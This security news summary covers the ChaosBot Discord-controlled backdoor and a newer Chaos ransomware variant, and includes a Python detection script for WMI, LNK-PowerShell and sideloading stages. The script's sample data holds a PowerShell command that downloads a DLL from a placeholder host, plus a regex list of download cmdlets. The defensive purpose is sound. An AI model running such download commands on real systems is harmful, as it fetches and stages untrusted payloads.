- A new Rust-based backdoor named ChaosBot allows remote command execution and reconnaissance on infected Windows systems.
- ChaosBot uses Discord accounts for command-and-control communication with compromised devices.
- The malware spreads via compromised credentials and phishing messages containing malicious Windows shortcut (LNK) files.
- ChaosBot employs evasion techniques such as bypassing Windows Event Tracing and detecting virtual machines to avoid analysis.
- Chaos Ransomware has evolved with destructive file deletion and clipboard hijacking features to increase financial theft.
Cybersecurity experts identified a new backdoor malware called ChaosBot written in Rust, targeting Windows systems to gather information and run arbitrary commands. This malware was discovered by eSentire in late September 2025 within a financial services company’s network.
Threat actors gained access using stolen credentials linked to Cisco VPN and an over-privileged Active Directory account named “serviceaccount.” They used Windows Management Instrumentation (WMI) to remotely execute commands and deploy ChaosBot across the network. Notably, the malware uses Discord profiles operated by users “chaos_00019” and “lovebb0024” to issue commands to infected computers.
The malware may also spread through phishing emails that include malicious Windows shortcut files. When opened, these files execute PowerShell commands to download and launch ChaosBot while displaying a fake PDF to distract victims. The malware loads a malicious DLL by sideloading it with a Microsoft Edge executable, after which it performs system checks and installs a reverse proxy using the open-source FRP tool to maintain network access.
The operators attempted but failed to configure additional backdoors using Visual Studio Code Tunnel services. The main function remains interacting with the Discord channel associated with the victim’s computer for further instructions. ChaosBot supports commands for running shell commands, taking screenshots, and transferring files between victims and the Discord channel.
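The intrusion chain described above (remote execution through WMI, an LNK-launched PowerShell downloader, and a DLL sideloaded by an Edge executable) is the kind of sequence endpoint telemetry can surface. The following is an added example, not code from eSentire or this article: it runs three simple stage classifiers over constructed Sysmon-style process-creation and image-load records; every path, file name and URL in the sample data is invented.

```python
import re

# Constructed records in the spirit of Sysmon Event ID 1 (process create)
# and Event ID 7 (image load). Sample data only, not from the report.
SAMPLE_EVENTS = [
    {"event": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -c \"iwr http://example.invalid/x.dll -OutFile $env:TEMP\\x.dll\""},
    {"event": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"cmd /c C:\Users\Public\msedge.exe"},
    {"event": 7, "image": r"C:\Users\Public\msedge.exe",        # Edge binary copied outside its install dir
     "loaded": r"C:\Users\Public\msedgeupdate.dll"},           # hypothetical sideloaded DLL name
    {"event": 7, "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "loaded": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.dll"},
    {"event": 1, "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

# Download primitives commonly seen in LNK-launched PowerShell stagers.
DOWNLOAD_CMDLETS = re.compile(r"\b(invoke-webrequest|iwr|downloadstring|downloadfile|curl|wget)\b", re.I)
# Legitimate Edge installation roots; an msedge.exe elsewhere is suspicious.
EDGE_DIRS = (r"c:\program files\microsoft\edge", r"c:\program files (x86)\microsoft\edge")

def _base(path): return path.rsplit("\\", 1)[-1].lower()
def _dir(path): return path.rsplit("\\", 1)[0].lower()

def classify(ev):
    """Return the stage labels one record matches (empty list = no hit)."""
    hits = []
    if ev["event"] == 1:
        img, parent = _base(ev["image"]), _base(ev["parent"])
        # Lateral movement: WMI provider host spawning a shell interpreter.
        if parent == "wmiprvse.exe" and img in ("cmd.exe", "powershell.exe", "pwsh.exe"):
            hits.append("wmi-remote-exec")
        # Phishing stage: user-launched PowerShell that pulls a payload.
        if img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
                and DOWNLOAD_CMDLETS.search(ev["cmdline"]):
            hits.append("lnk-powershell-download")
    elif ev["event"] == 7:
        # Sideload pattern: Edge binary outside its install root loading a DLL beside itself.
        if _base(ev["image"]) == "msedge.exe" and not _dir(ev["image"]).startswith(EDGE_DIRS) \
                and _dir(ev["loaded"]) == _dir(ev["image"]):
            hits.append("edge-dll-sideload-candidate")
    return hits

def scan(events):
    """Map record index -> labels for every record that hits at least one rule."""
    return {i: hits for i, ev in enumerate(events) if (hits := classify(ev))}
```

Each rule alone produces noise in a real estate; the value is in correlating the three labels on one host within a short window.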
Researchers at eSentire reported that newer versions of ChaosBot use methods to avoid detection by Event Tracing for Windows (ETW) and to identify virtual machines through MAC address checks. If a virtual machine is detected, the malware exits to prevent analysis.
Separately, Fortinet FortiGuard Labs described an updated variant of Chaos ransomware written in C++ that includes new capabilities. This version can irreversibly delete large files instead of encrypting them, and it can hijack clipboard content by replacing legitimate Bitcoin addresses with those controlled by attackers. This tactic aims to increase financial losses through both data destruction and cryptocurrency theft.
The ransomware disguises itself as fake utilities like System Optimizer v2.1 to trick users into installing it. It checks for a file indicating previous infection before starting encryption. If run with admin rights, it disables system recovery features and encrypts files smaller than 50 MB, skipping those between 50 MB and 1.3 GB for efficiency. It uses various encryption methods, including symmetric, asymmetric, and a backup XOR routine to make removal more difficult.
For further information on ChaosBot, see the eSentire report. Details on the ransomware evolution are available in the Fortinet FortiGuard Labs report.